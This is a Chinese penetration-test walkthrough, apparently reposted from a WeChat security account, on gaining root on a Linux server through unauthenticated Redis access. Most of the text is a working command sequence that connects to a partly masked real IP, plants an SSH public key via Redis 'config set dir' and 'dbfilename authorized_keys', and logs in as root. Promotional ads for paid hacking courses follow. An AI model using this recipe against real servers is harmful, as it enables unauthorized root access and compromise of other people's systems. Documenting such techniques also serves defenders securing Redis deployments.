在一次渗透测试中拿到一个ip地址52.80.249.xx,nmap端口扫描出22,6379,80端口,目标机是linux系统的一台服务器,6379为redis的默认端口,尝试对其进行利用。使用kali作为攻击机
一、环境准备
1.1、在攻击机上面下载redis
wget http://download.redis.io/releases/redis-2.8.17.tar.gz
1.2解压文件,执行文件
解压文件:tar xzf redis-2.8.17.tar.gz
进入redis目录:cd redis-2.8.17
安装:make
1.3、进入src目录,将redis-server和redis-cli拷贝到/usr/bin目录下(这样以后启动redis就不用进入安装目录了)
cd src
cp redis-server /usr/bin
cp redis-cli /usr/bin
1.4、、返回目录redis-2.8.17,将redis.conf拷贝到/etc/目录下
cd ../
cp redis.conf /etc/
1.5、使用/etc/目录下的reids.conf文件中的配置启动redis服务:
redis-server /etc/redis.conf
1.6、然后ctrl+c退出,再次进入src目录然后连接目标靶机的redis服务
ctrl+c
cd src
redis-cli –h 52.80.249.xx
出现52.80.249.xx:6379>就代表连接成功,并且没有输入密码
二、漏洞利用
2.1、这里附上一个这里没法利用的一种 攻击方式截图(没有测试仅供参考)
2.2、我们这里是不知道路径的,根据前期信息收集知道还有ssh服务的22端口是开放的,可以利用“公私钥”认证获取root权限
使用ssh生成公钥和私钥文件
ssh-keygen -t rsa
2.3、进入.ssh文件下,将上面生成的公钥保存到1.txt里面
cd /root/.ssh
(echo -e "nn";cat id_rsa.pub; echo -e "nn") > 1.txt
2.4、将生成的公钥文件通过redis上传到目标服务器
cat 1.txt | redis-cli -h 52.80.249.xx -x set crack
2.5、远程连接redis服务
redis-cli -h 52.80.249.xx
2.6、获得redis备份的路径
config get dir
2.7、更改redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):
2.8、设置上传公钥的备份文件名字为authorized_keys:
config set dbfilename authorized_keys
2.9、检查是否更改成功(查看有没有authorized_keys文件),没有问题就保存然后退出,至此成功写入ssh公钥到靶机
config get dbfilename
2.10、攻击机直接ssh连接目标服务器
ssh -i id_rsa [email protected]
本文作者:天良, 转载请注明来自FreeBuf.COM
【Hacking黑白红】,一线渗透攻防实战交流公众号
回复“电子书”获取web渗透、CTF电子书:
回复“视频教程”获取渗透测试视频教程;
回复“内网书籍”获取内网学习书籍;
回复“CTF工具”获取渗透、CTF全套工具;
回复“内网渗透”;获取内网渗透资料;
回复“护网”;获取护网学习资料 ;
回复“python”,获取python视频教程;
回复“java”,获取Java视频教程;
回复“go”,获取go视频教程
知识星球
【Hacking藏经阁】知识星球致力于分享技术和认知。
1、技术方面。主攻渗透测试(web和内网)、CTF比赛、逆向、护网行动等;
400G渗透教学视频、80多本安全类电子书、50个渗透靶场(资料主要来自本人总结、以及学习过程中购买的课程)
2、认知方面。副业经营、人设IP打造,具体点公众号运营、抖*yin等自媒体运营(目前主要在运营两个平台4个号)。
如果你也想像我一样,不想35岁以后被动的去面试,那么加入星球我们一起成长。
欢迎加入99米/年,平均每天2毛7分钱,学习网络安全一整年。
▶【渗透实战系列】|45-记一次渗透实战-代码审计到getshell
▶【渗透实战系列】|44-记一次授权渗透实战(过程曲折,Java getshell)
▶【渗透实战系列】|42-防范诈骗,记一次帮助粉丝渗透黑入某盘诈骗的实战
▶【渗透实战系列】|40-APP渗透测试步骤(环境、代理、抓包挖洞)
▶【渗透实战系列】|35-旁站信息泄露的dedecms站点渗透
▶【渗透实战系列】|33-App渗透 ,由sql注入、绕过人脸识别、成功登录APP
▶【渗透实战系列】|32-FOFA寻找漏洞,绕过杀软拿下目标站
▶【渗透实战系列】|30-从SQL注入渗透内网(渗透的本质就是信息搜集)
▶【渗透实战系列】|29-实战|对某勒索APP的Getshell
▶【渗透实战系列】|27-对钓鱼诈骗网站的渗透测试(成功获取管理员真实IP)
▶【渗透实战系列】|25一次从 APP 逆向到 Getshell 的过程
▶【渗透实战系列】|24-针对CMS的SQL注入漏洞的代码审计思路和方法
▶【渗透实战系列】|18-手动拿学校站点 得到上万人的信息(漏洞已提交)
▶【渗透实战系列】|17-巧用fofa对目标网站进行getshell
▶【渗透实战系列】|15-博彩网站(APP)渗透的常见切入点
▶【渗透实战系列】|12 -渗透实战, 被骗4000花呗背后的骗局
▶【渗透实战系列】|10 - 记某色X商城支付逻辑漏洞的白嫖(修改价格提交订单)
▶【渗透实战系列】|9-对境外网站开展的一次web渗透测试(非常详细,适合打战练手)
▶【渗透实战系列】|8-记一次渗透测试从XSS到Getshell过程(详细到无语)
▶【渗透实战系列】|1一次对跨境赌博类APP的渗透实战(getshell并获得全部数据)
点分享
点收藏
点点赞
点在看
原文始发于微信公众号(Hacking黑白红):redis未授权访问配合ssh免密登录getshell
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论